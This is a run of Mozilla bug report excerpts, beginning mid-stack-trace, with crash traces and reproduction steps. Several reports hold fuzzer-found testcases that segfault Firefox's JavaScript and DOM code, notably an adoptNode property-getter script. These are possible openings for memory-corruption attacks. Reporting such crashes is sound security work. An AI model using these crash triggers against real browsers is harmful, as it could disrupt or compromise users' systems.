#14 0x7f0a5f345619 in nsLineLayout::ReflowFrame(nsIFrame*, nsReflowStatus&, mozilla::ReflowOutput*, bool&) /builds/worker/workspace/build/src/layout/generic/nsLineLayout.cpp:921:13
#15 0x7f0a5f1b60a4 in nsBlockFrame::ReflowInlineFrame(mozilla::BlockReflowInput&, nsLineLayout&, nsLineList_iterator, nsIFrame*, LineReflowStatus*) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:4220:15
#16 0x7f0a5f1b4cb8 in nsBlockFrame::DoReflowInlineFrames(mozilla::BlockReflowInput&, nsLineLayout&, nsLineList_iterator, nsFlowAreaRect&, int&, nsFloatManager::SavedState*, bool*, LineReflowStatus*, bool) /builds/worker/workspace/build
/src/layout/generic/nsBlockFrame.cpp:4016:5
#17 0x7f0a5f1ac749 in nsBlockFrame::ReflowInlineFrames(mozilla::BlockReflowInput&, nsLineList_iterator, bool*) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3890:9
#18 0x7f0a5f1a6308 in nsBlockFrame::ReflowLine(mozilla::BlockReflowInput&, nsLineList_iterator, bool*) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2873:5
#19 0x7f0a5f19be0f in nsBlockFrame::ReflowDirtyLines(mozilla::BlockReflowInput&) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2409:7
#20 0x7f0a5f192bc2 in nsBlockFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:1235:3
#21 0x7f0a5f1eed8a in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, mozilla::WritingMode const&, mozilla::LogicalPoint const&, nsSize const&, unsigned int, nsReflowStatus&
, nsOverflowContinuationTracker*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:932:14
#22 0x7f0a5f1ed6c1 in nsCanvasFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /builds/worker/workspace/build/src/layout/generic/nsCanvasFrame.cpp:752:5
#23 0x7f0a5f1eed8a in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, mozilla::WritingMode const&, mozilla::LogicalPoint const&, nsSize const&, unsigned int, nsReflowStatus&
, nsOverflowContinuationTracker*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:932:14
#24 0x7f0a5f2ac638 in nsHTMLScrollFrame::ReflowScrolledFrame(mozilla::ScrollReflowInput*, bool, bool, mozilla::ReflowOutput*, bool) /builds/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:548:3
#25 0x7f0a5f2adcee in nsHTMLScrollFrame::ReflowContents(mozilla::ScrollReflowInput*, mozilla::ReflowOutput const&) /builds/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:660:3
#26 0x7f0a5f2b0e99 in nsHTMLScrollFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /builds/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:1037:3
#27 0x7f0a5f179cf3 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, int, int, unsigned int, nsReflowStatus&, nsOverflowContinuationTracker*) /builds/worker/workspace/build
/src/layout/generic/nsContainerFrame.cpp:976:14
#28 0x7f0a5f178655 in mozilla::ViewportFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /builds/worker/workspace/build/src/layout/generic/ViewportFrame.cpp:330:7
#29 0x7f0a5ef7ada7 in mozilla::PresShell::DoReflow(nsIFrame*, bool) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:9407:11
|
|
1,401,726 | 12,687,282 |
Created attachment 8910475
trigger.html
Testcase found while fuzzing mozilla-central rev a20de99fa3c1.
==16005==ERROR: AddressSanitizer: SEGV on unknown address 0x00000000001c (pc 0x7f440bd8efaa bp 0x7ffef99e5810 sp 0x7ffef99e57e0 T0)
==16005==The signal is caused by a READ memory access.
==16005==Hint: address points to the zero page.
#0 0x7f440bd8efa9 in GetBoolFlag /builds/worker/workspace/build/src/dom/base/nsINode.h:1615:12
#1 0x7f440bd8efa9 in IsElement /builds/worker/workspace/build/src/dom/base/nsINode.h:457
#2 0x7f440bd8efa9 in nsLabelsNodeList::PopulateSelf(unsigned int) /builds/worker/workspace/build/src/dom/base/nsContentList.cpp:1273
#3 0x7f440bd892b3 in BringSelfUpToDate /builds/worker/workspace/build/src/dom/base/nsContentList.cpp:1049:5
#4 0x7f440bd892b3 in Length /builds/worker/workspace/build/src/dom/base/nsContentList.cpp:526
#5 0x7f440bd892b3 in nsContentList::GetLength(unsigned int*) /builds/worker/workspace/build/src/dom/base/nsContentList.cpp:667
#6 0x7f440c65a854 in Length /builds/worker/workspace/build/src/dom/base/nsINodeList.h:47:5
#7 0x7f440c65a854 in mozilla::dom::NodeListBinding::get_length(JSContext*, JS::Handle<JSObject*>, nsINodeList*, JSJitGetterCallArgs) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/NodeListBinding.cpp:68
#8 0x7f440d95a5f6 in mozilla::dom::GenericBindingGetter(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2924:13
#9 0x7f4413fcda24 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
#10 0x7f4413fcda24 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495
#11 0x7f4413fcf45f in InternalCall /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:540:12
#12 0x7f4413fcf45f in Call /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:559
#13 0x7f4413fcf45f in js::CallGetter(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:674
#14 0x7f4414f7ba65 in CallGetter /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2123:16
#15 0x7f4414f7ba65 in GetExistingProperty<js::AllowGC::CanGC> /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2171
#16 0x7f4414f7ba65 in NativeGetPropertyInline<js::AllowGC::CanGC> /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2385
#17 0x7f4414f7ba65 in js::NativeGetProperty(JSContext*, JS::Handle<js::NativeObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2421
#18 0x7f4414a1de7c in GetProperty /builds/worker/workspace/build/src/js/src/vm/NativeObject.h:1540:12
#19 0x7f4414a1de7c in JS_ForwardGetPropertyTo(JSContext*, JS::Handle<JSObject*>, JS::Handle<jsid>, JS::Handle<JS::Value>, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2652
#20 0x7f440d95280f in mozilla::dom::GetPropertyOnPrototype(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, bool*, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2097:10
#21 0x7f440c5de7e6 in mozilla::dom::NodeListBinding::DOMProxyHandler::get(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, JS::MutableHandle<JS::Value>) const /builds/worker/workspace/build/src/obj-firefox/dom/bindings/NodeListBinding.cpp:445:8
#22 0x7f4414cb1ff0 in getInternal /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:338:21
#23 0x7f4414cb1ff0 in js::Proxy::get(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:348
#24 0x7f4413fd7e3b in GetProperty /builds/worker/workspace/build/src/js/src/vm/NativeObject.h:1539:16
#25 0x7f4413fd7e3b in GetProperty /builds/worker/workspace/build/src/js/src/jsobj.h:834
#26 0x7f4413fd7e3b in js::GetProperty(JSContext*, JS::Handle<JS::Value>, JS::Handle<js::PropertyName*>, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:4426
#27 0x7f4413fba6dc in GetPropertyOperation /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:218:12
#28 0x7f4413fba6dc in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2803
#29 0x7f4413f9eb4b in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:435:12
#30 0x7f4413fd0337 in js::ExecuteKernel(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value const&, js::AbstractFramePtr, JS::Value*) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:724:15
#31 0x7f4413fd0ba2 in js::Execute(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value*) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:756:12
#32 0x7f4414a34c79 in ExecuteScript(JSContext*, JS::AutoObjectVector&, JS::Handle<JSScript*>, JS::Value*) /builds/worker/workspace/build/src/js/src/jsapi.cpp:4667:12
#33 0x7f440bf5d729 in nsJSUtils::ExecutionContext::CompileAndExec(JS::CompileOptions&, JS::SourceBufferHolder&, JS::MutableHandle<JSScript*>) /builds/worker/workspace/build/src/dom/base/nsJSUtils.cpp:265:8
#34 0x7f440f6458d8 in mozilla::dom::ScriptLoader::EvaluateScript(mozilla::dom::ScriptLoadRequest*) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:2244:25
#35 0x7f440f640d0c in mozilla::dom::ScriptLoader::ProcessRequest(mozilla::dom::ScriptLoadRequest*) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:1884:10
#36 0x7f440f624575 in mozilla::dom::ScriptLoader::ProcessScriptElement(nsIScriptElement*) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:1585:10
#37 0x7f440f620ad8 in mozilla::dom::ScriptElement::MaybeProcessScript() /builds/worker/workspace/build/src/dom/script/ScriptElement.cpp:149:18
#38 0x7f440ae75b1f in AttemptToExecute /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIScriptElement.h:225:18
#39 0x7f440ae75b1f in nsHtml5TreeOpExecutor::RunScript(nsIContent*) /builds/worker/workspace/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:701
#40 0x7f440ae6f46a in nsHtml5TreeOpExecutor::RunFlushLoop() /builds/worker/workspace/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:502:7
#41 0x7f440ae7959b in nsHtml5ExecutorFlusher::Run() /builds/worker/workspace/build/src/parser/html/nsHtml5StreamParser.cpp:130:20
#42 0x7f44092ec91d in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1039:14
#43 0x7f44092f2658 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:521:10
#44 0x7f440a0969b1 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
#45 0x7f4409ff887b in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
#46 0x7f4409ff887b in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
#47 0x7f4409ff887b in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
#48 0x7f440f7a465f in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:158:27
#49 0x7f4413900271 in nsAppStartup::Run() /builds/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:288:30
#50 0x7f4413ae0dbb in XREMain::XRE_mainRun() /builds/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4701:22
#51 0x7f4413ae29b8 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&) /builds/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4865:8
#52 0x7f4413ae3deb in XRE_main(int, char**, mozilla::BootstrapConfig const&) /builds/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4960:21
#53 0x4ebea3 in do_main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:236:22
#54 0x4ebea3 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:309
#55 0x7f44270b682f in __libc_start_main /build/glibc-bfm8X4/glibc-2.23/csu/../csu/libc-start.c:291
#56 0x41d9f8 in _start (/home/forb1dden/builds/mc-asan/firefox+0x41d9f8)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /builds/worker/workspace/build/src/dom/base/nsINode.h:1615:12 in GetBoolFlag
==16005==ABORTING
|
|
1,406,154 | 12,733,200 |
This bug was filed from the Socorro interface and is
report bp-0fb3f4a6-ff46-42a8-a95c-fe61e0171005.
=============================================================
This is a stack overflow bug, but the stack doesn't make a whole lot of sense to me. Might be that we're overflowing |buffer|. Seems to have been introduced in 54. By far the most common crash in nr_*.
|
|
1,406,222 | 12,733,765 |
Created attachment 8915777
test_case.html
thread '<unnamed>' panicked at 'called `Option::unwrap()` on a `None` value', /checkout/src/libcore/option.rs:335
stack backtrace:
0: 0x7fe8e65909b3 - std::sys::imp::backtrace::tracing::imp::unwind_backtrace::hcab99e0793da62c7
at /checkout/src/libstd/sys/unix/backtrace/tracing/gcc_s.rs:49
1: 0x7fe8e658d979 - std::panicking::default_hook::{{closure}}::h9ba2c6973907a2be
at /checkout/src/libstd/sys_common/backtrace.rs:71
at /checkout/src/libstd/sys_common/backtrace.rs:60
at /checkout/src/libstd/panicking.rs:355
2: 0x7fe8e658cda0 - std::panicking::default_hook::he4d55e2dd21c3cca
at /checkout/src/libstd/panicking.rs:371
3: 0x7fe8e658c8c5 - std::panicking::rust_panic_with_hook::ha138c05cd33ad44d
at /checkout/src/libstd/panicking.rs:549
4: 0x7fe8e658c7df - std::panicking::begin_panic::hcdbfa35c94142fa2
at /checkout/src/libstd/panicking.rs:511
5: 0x7fe8e658c749 - std::panicking::begin_panic_fmt::hc09fe500d9b7be81
at /checkout/src/libstd/panicking.rs:495
6: 0x7fe8e659ae86 - core::panicking::panic_fmt::h883a028e9f4b4457
at /checkout/src/libstd/panicking.rs:471
7: 0x7fe8e659cc95 - core::panicking::panic::hdb3cf3207dda37bb
at /checkout/src/libcore/panicking.rs:49
8: 0x7fe8e64eac2e - style::stylist::Stylist::compute_style_with_inputs::ha1cd7ecde12a429a
|
|
1,406,398 | 12,735,299 |
Test case:
<html>
<body>
<iframe id="myiframe"></iframe>
<script>
var d = document.createElement("input");
Object.defineProperties(d, {
p: {
get() {
myiframe.contentDocument.adoptNode(d);
}, enumerable: true
},
q: {
enumerable: true
}
});
Object.values(d);
</script>
</body>
</html>
Stack trace:
---
Thread 1 "firefox" received signal SIGSEGV, Segmentation fault.
0x00007fffe9b01118 in js::NativeObject::lookup (this=<optimised out>, cx=<optimised out>, id=...) at /home/andre/hg/mozilla-inbound/js/src/vm/NativeObject.cpp:260
260 MOZ_ASSERT(isNative());
(gdb) bt
#0 0x00007fffe9b01118 in js::NativeObject::lookup(JSContext*, jsid) (this=<optimised out>, cx=<optimised out>, id=...) at /home/andre/hg/mozilla-inbound/js/src/vm/NativeObject.cpp:260
#1 0x00007fffe94ffb2f in EnumerableOwnProperties(JSContext*, JS::CallArgs const&, EnumerableOwnPropertiesKind) (cx=cx@entry=0x7fffdee5d000, args=..., kind=kind@entry=Values)
at /home/andre/hg/mozilla-inbound/js/src/builtin/Object.cpp:1271
#2 0x00007fffe95003ce in obj_values(JSContext*, unsigned int, JS::Value*) (cx=0x7fffdee5d000, argc=<optimised out>, vp=<optimised out>) at /home/andre/hg/mozilla-inbound/js/src/builtin/Object.cpp:1331
#3 0x00007fffe9493981 in js::CallJSNative(JSContext*, bool (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&) (cx=0x7fffdee5d000, native=0x7fffe9500390 <obj_values(JSContext*, unsigned int, JS::Value*)>, args=...) at /home/andre/hg/mozilla-inbound/js/src/jscntxtinlines.h:293
#4 0x00007fffe948828f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) (cx=cx@entry=0x7fffdee5d000, args=..., construct=construct@entry=js::NO_CONSTRUCT)
at /home/andre/hg/mozilla-inbound/js/src/vm/Interpreter.cpp:495
#5 0x00007fffe948872d in InternalCall(JSContext*, js::AnyInvokeArgs const&) (cx=0x7fffdee5d000, args=...) at /home/andre/hg/mozilla-inbound/js/src/vm/Interpreter.cpp:540
#6 0x00007fffe947a85c in Interpret(JSContext*, js::RunState&) (args=..., cx=<optimised out>) at /home/andre/hg/mozilla-inbound/js/src/vm/Interpreter.cpp:546
#7 0x00007fffe947a85c in Interpret(JSContext*, js::RunState&) (cx=0x7fffdee5d000, state=...) at /home/andre/hg/mozilla-inbound/js/src/vm/Interpreter.cpp:3085
#8 0x00007fffe9487d0c in js::RunScript(JSContext*, js::RunState&) (cx=0x7fffdee5d000, state=...) at /home/andre/hg/mozilla-inbound/js/src/vm/Interpreter.cpp:435
....
---
Regressed by: bug 1232639 (Firefox 47)
|
|
837,539 | 7,065,718 |
Created attachment 709525
testcase
This seems to be a crash in the device driver of MacOS.
newton % sw_vers
ProductName: Mac OS X
ProductVersion: 10.8.2
BuildVersion: 12C3006
Before the crash happens we can see in the console:
Sun Feb 3 22:32:42 2013 CMIO_Unit_Output_Base.cpp:197:RenderBus something has gone wrong!
Sun Feb 3 22:32:42 2013 CMIO_Unit_Output_Base.cpp:199:RenderBus idx = 0, mNumInputs = 1, mNumInputsAllocatedFor = 0
Sun Feb 3 22:32:42 2013 CMIO_Unit_Output_Base.cpp:201:RenderBus theInput = 0x1211dec80, mPullInputOnNextRound = 0x0, mInputHasSeenEndOfData = 0x0
[...]
The testcase will not crash in a debug/non-opt build.
Tested with m-i changeset: 120689:eae4b34eb792 and -O2
Tested with m-c changeset: 120354:2cc710018b14 and -O2
|
|
1,002,280 | 8,718,264 |
User Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 (Beta/Release)
Build ID: 20140421221237
Steps to reproduce:
1./ Create a simple HTML file (test.html) with the following content:
<!DOCTYPE HTML>
<html>
<head>
</head>
<body>
<div id="1"></div>
</body>
</html>
2./ Open test.html in FF then press F12 (opens the dev tools)
3./ Expand the DOM tree and select the div with id="1"
4./ Press F5 to refresh the page
Actual results:
After selection of the element starting with a numeric value and refreshing the page, the inspector window goes blank (the DOM tree is hidden).
The browser console displays:
DOMException {code: 12, message: "An invalid or illegal string was specified", result: 2152923148, name: "SyntaxError", filename: "resource://gre/modules/commonjs/toolkit/loader.js -> resource://gre/modules/devtools/server/actors/inspector.js", lineNumber: 1398, columnNumber: 0, inner: null, data: null, location: XPCWrappedNative_NoHelper} protocol.js:817
10:48:47.058 "unknownError" protocol.js:20
Expected results:
The DOM Tree should still be there. Non-HTML 5 ids shouldn't start with a number but HTML 5 is more permissive and this id should be allowed. In any case it shouldn't crash.
|
|
1,008,044 | 8,771,560 |
I am trying to generate a reduced test case, but I am noticing a problem where change events will be fired for the wrong datastore when trying to sync with more than one.
E.g., two datastores:
datastore1.addEventListener('change', firstListener);
datastore2.addEventListener('change', secondListener);
When I update a record for one of the datastores it appears that the callbacks get fired from both addEventListener calls.
|
|
1,010,685 | 8,795,753 |
Steps to reproduce
------------------
1.Go to Music app. Play a very small AMR clip.
2.Set it as ringtone.
Actual behavior:
Cannot set it as ringtone. It fails with extractor sniffing and gecko errors
D/ExtendedUtils( 202): Try creating ExtendedExtractor
E/ExtendedExtractor( 202): Failed to instantiate extractor
D/ExtendedUtils( 202): Couldn't create the extended extractor, return default one
E/GeckoConsole( 202): [JavaScript Warning: "Media resource blob:d36d10ee-ae32-4846-9c9c-d8c31962e986 could not be decoded." {file: "app://system.gaiamobile.org/index.html" line: 0}]
Expected behavior:
The clip should get set as ringtone.
Analysis
nsFileInputStream::Read() closes the file on EOF [1]
To reopen the file, Seek should happen before any further read [2]
MediaStreamSource does seek only when offset is not equal to mResource->Tell() [3]
But When file is closed, mResource->Tell() returns 0, since FileMediaResource::Tell() offset is initialized to 0 [4] and nsInputStreamBase::Tell() can't get position of closed file [5]
So mResource->Tell() becomes equal to offset (both are 0) at [3], seek won''t happen and further read fails.
Initializing FileMediaResource::Tell() offset to -ve value here [4] makes it work.
Sniffing involves reading same file multiple times with different header lengths. Since this media file is very short, (<6KB) EOF can be reached during sniffing sometimes and we hit this corner case while setting ringtone.
[1] https://www.codeaurora.org/cgit/quic/lf/b2g/mozilla/gecko/tree/netwerk/base/src/nsFileStreams.cpp?h=mozilla/v1.4#n477
[2] https://www.codeaurora.org/cgit/quic/lf/b2g/mozilla/gecko/tree/netwerk/base/src/nsFileStreams.cpp?h=mozilla/v1.4#n504
[3] https://www.codeaurora.org/cgit/quic/lf/b2g/mozilla/gecko/tree/content/media/omx/OmxDecoder.cpp?h=mozilla/v1.4#n256
[4] https://www.codeaurora.org/cgit/quic/lf/b2g/mozilla/gecko/tree/content/media/MediaResource.cpp?h=mozilla/v1.4#n1538
[5] https://www.codeaurora.org/cgit/quic/lf/b2g/mozilla/gecko/tree/netwerk/base/src/nsFileStreams.cpp?h=mozilla/v1.4#n72
|
|
1,000,182 | 8,698,829 |
The following testcase crashes on mozilla-central revision 1ab07aa4d004 (run with --fuzzing-safe):
function range(n, m) {
var result = [];
result.push(i);
return result;
for (var i = 0, l = a.length; i < l; i++) {}
}
function b(opFunction, cmpFunction) {
var result = opFunction({mode:"compile"});
var result = opFunction({mode:"par"});
}
function a(arr, op, func, cmpFunc) {
b(function (m) { return arr[op + "Par"].apply(arr, [func, m]); }, function(m) {});
}
a(range(0, 1024), "map", function (i) {});
oomAfterAllocations(10);
|
|
980,223 | 8,498,752 |
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0 (Beta/Release)
Build ID: 20140305170806
Steps to reproduce:
Booted today’s Nightly, which automatically started rendering our company jukebox. I don’t have a reduced testcase and the code isn’t public, but I can supply one if required. Hopefully it’s obvious from the crash signature and window.
Actual results:
Crash. Some signatures:
https://crash-stats.mozilla.com/report/index/3b6207be-f652-4119-94e4-535822140306
https://crash-stats.mozilla.com/report/index/393e8d94-f31d-40c0-811e-4c90a2140306
Expected results:
No boom. I definitely had a nightly from two days ago that wasn’t crashing, think I also was using yesterday’s without incident.
|
|
761,178 | 6,361,367 |
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0
Build ID: 20120420145725
Steps to reproduce:
- Import new CalDAV-calendar with URL of form "http://[server]/davical/caldav.php/[working group]/abwesenheit//"
(Note the terminating double slashes)
- Create new appointment
- Duplicate it by copy/paste
- Delete one of them -> works fine
- Delete the other one -> Error message about missing resource
- It might not be necessary to duplicate the entry, but this is how it was reproduced twice.
Actual results:
- Import worked, showing existing entries in the calendar
- When deleting the first entry, Lightning creates a command which causes CalDAV to remove the entire calendar file. The server log reads like this:
[IP] - [username] [04/Jun/2012:11:27:57 +0200] "DELETE /davical/caldav.php/[working group]/abwesenheit// HTTP/1.0" 204 465 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20120428 Thunderbird/12.0.1 Lightning/1.4"
[IP] - [username] [04/Jun/2012:11:27:59 +0200] "DELETE /davical/caldav.php/[working group]/abwesenheit// HTTP/1.0" 404 508 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20120428 Thunderbird/12.0.1 Lightning/1.4"
The problem does not occur when removing one of the terminating slashes of the URL.
Expected results:
Just the two entries should have been deleted, leaving the rest of the data intact.
|
|
740,638 | 6,183,521 |
Current view counts are broken. Our most popular videos are stuck at 100 or 200 views.
Our current logic occurs via an ajax request whenever a user views a video. We store the view counts in the cache and write them back to the database at certain intervals:
views < 10 = write every view
views < 100 = write every 5 views
views < 1000 = write every 25 views
views > 1000 = write every 100 views
However, it seems that the cache values are getting purged (they live forever so should only get purged when the cache runs out of room) before the writes can happen.
Thus, we should switch to the following:
views < 100 = write every view
views > 100 = write every 10 views
In addition, we should add a cron job that runs e very 15 minutes that checks the view counts stored in the cache and writes them to the database.
I'd like this fix to go out ASAP since it is currently affecting our videos and has already cost the filmmakers several thousand views (that's a guess).
|
|
927,358 | 7,966,602 |
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/536.30.1 (KHTML, like Gecko) Version/6.0.5 Safari/536.30.1
Steps to reproduce:
Call navigator.mozGetUserMedia() in FF Nightly with the following constraints (which is working in FF 24)
{ audio: true, video: { mandatory: { maxWidth: 320, maxHeight: 240 }}}
Actual results:
This will produce an error
navigator.getUserMedia error: NOT_SUPPORTED_ERR: maxWidth
Expected results:
Investigating into the src code the reason seems to be in the changes to MediaStreamTrack.webidl
https://github.com/mozilla/mozilla-central/blob/FIREFOX_24_0_RELEASE/dom/webidl/MediaStreamTrack.webidl
https://github.com/mozilla/mozilla-central/blob/master/dom/webidl/MediaStreamTrack.webidl
Is there any plans to add validation of minWidth/maxWidth/minHeight/maxHeight to the media constraints? Or is there any reason for having removed the possibility to set those in mozGetUserMedia?
|
|
885,189 | 7,555,635 |
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0 (Beta/Release)
Build ID: 20130511120803
Steps to reproduce:
Post in an existing thread or start a new thread
Actual results:
No email notification when a post or response has been made.
Expected results:
Email should've been sent.
Community Discussion: https://support.mozilla.org/en-US/forums/contributors/709282?last=52724
|
|
886,849 | 7,572,079 |
Created attachment 767266
customfirefox_toolbar.xpi
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0 (Beta/Release)
Build ID: 20130511120803
Steps to reproduce:
Build the AOL DE Edition for Firefox with an AOL xpi extension. The url to
get the xpi -
http://client.web.aol.com/toolbarfiles/Prod/downloads/aol/customfirefox/current/aol_toolbar.xpi - this is an update to the current custom browser.
Expected results:
This is the AOL toolbar for the Firefox 22 release.
|
|
886,851 | 7,572,081 |
Created attachment 767267
aoluk-ff_toolbar.xpi
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0 (Beta/Release)
Build ID: 20130511120803
Steps to reproduce:
Build the AOL UK Edition for Firefox with an AOL xpi extension. The url to
get the xpi -
http://client.web.aol.com/toolbarfiles/Prod/downloads/aoluk/customfirefox/current/aoluk_toolbar.xpi -this is an update to the current custom browser.
Expected results:
This is the AOL UK toolbar for the Firefox 22 release.
|
|
914,823 | 7,844,965 |
This bug was filed from the Socorro interface and is
report bp-4e6f43df-cc97-436e-a74b-486172130910.
=============================================================
Crashing Thread
Frame Module Signature Source
0 libxul.so mozilla::gl::SharedSurface_Gralloc::~SharedSurface_Gralloc gfx/gl/SharedSurfaceGralloc.cpp
1 libxul.so mozilla::gl::SharedSurface_Gralloc::~SharedSurface_Gralloc gfx/gl/SharedSurfaceGralloc.cpp
2 libxul.so mozilla::gfx::SurfaceStream::Delete(mozilla::gfx::SharedSurface*&) gfx/gl/SurfaceStream.cpp
3 libxul.so mozilla::gfx::SurfaceStream::~SurfaceStream gfx/gl/SurfaceStream.cpp
4 libxul.so mozilla::gfx::SurfaceStream_SingleBuffer::~SurfaceStream_SingleBuffer gfx/gl/SurfaceStream.cpp
5 libxul.so mozilla::gfx::SurfaceStream_SingleBuffer::~SurfaceStream_SingleBuffer gfx/gl/SurfaceStream.cpp
6 libxul.so mozilla::gl::GLScreenBuffer::~GLScreenBuffer gfx/gl/GLScreenBuffer.cpp
7 libxul.so mozilla::gl::GLScreenBuffer::~GLScreenBuffer gfx/gl/GLScreenBuffer.cpp
8 libxul.so mozilla::gl::GLContext::DestroyScreenBuffer() gfx/gl/GLContext.cpp
9 libxul.so mozilla::gl::GLContext::MarkDestroyed() gfx/gl/GLContext.cpp
10 libxul.so mozilla::gl::GLContextEGL::~GLContextEGL gfx/gl/GLContextProviderEGL.cpp
11 libxul.so mozilla::gl::GLContextEGL::~GLContextEGL gfx/gl/GLContextProviderEGL.cpp
12 libxul.so mozilla::detail::GenericRefCounted<(mozilla::detail::RefCountAtomicity)0>::Release() /builds/slave/b2g_m-cen_hamachi_ntly-0000000/build/objdir-gecko/gfx/gl/../../dist/include/mozilla/GenericRefCounted.h
13 libxul.so mozilla::gfx::DrawTargetSkia::~DrawTargetSkia /builds/slave/b2g_m-cen_hamachi_ntly-0000000/build/objdir-gecko/gfx/2d/../../dist/include/mozilla/RefPtr.h
14 libxul.so mozilla::gfx::DrawTargetSkia::~DrawTargetSkia gfx/2d/DrawTargetSkia.cpp
15 libxul.so mozilla::detail::RefCounted<mozilla::gfx::DrawTarget, (mozilla::detail::RefCountAtomicity)1>::Release() const /builds/slave/b2g_m-cen_hamachi_ntly-0000000/build/objdir-gecko/image/src/../../dist/include/mozilla/RefPtr.h
